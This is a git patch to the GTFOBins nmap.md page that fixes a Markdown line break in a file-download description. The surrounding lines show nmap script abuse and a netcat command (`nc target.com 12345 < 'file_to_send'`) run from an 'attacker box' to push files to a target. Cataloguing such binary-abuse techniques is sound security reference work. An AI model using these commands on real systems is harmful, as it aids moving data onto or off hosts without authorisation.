From 205e922b9bea860955ad6ce5dd9375695dc37bf8 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 29 Jul 2019 15:17:37 +0200 Subject: [PATCH] Fix Markdown line break --- _gtfobins/nmap.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index d3aa487..0d24a00 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -55,8 +55,7 @@ functions: t:close();' > $TF nmap --script=$TF file-download: - - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 - < "file_to_send"` on the attacker box to send the file. + - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | export LPORT=12345 export LFILE=file_to_save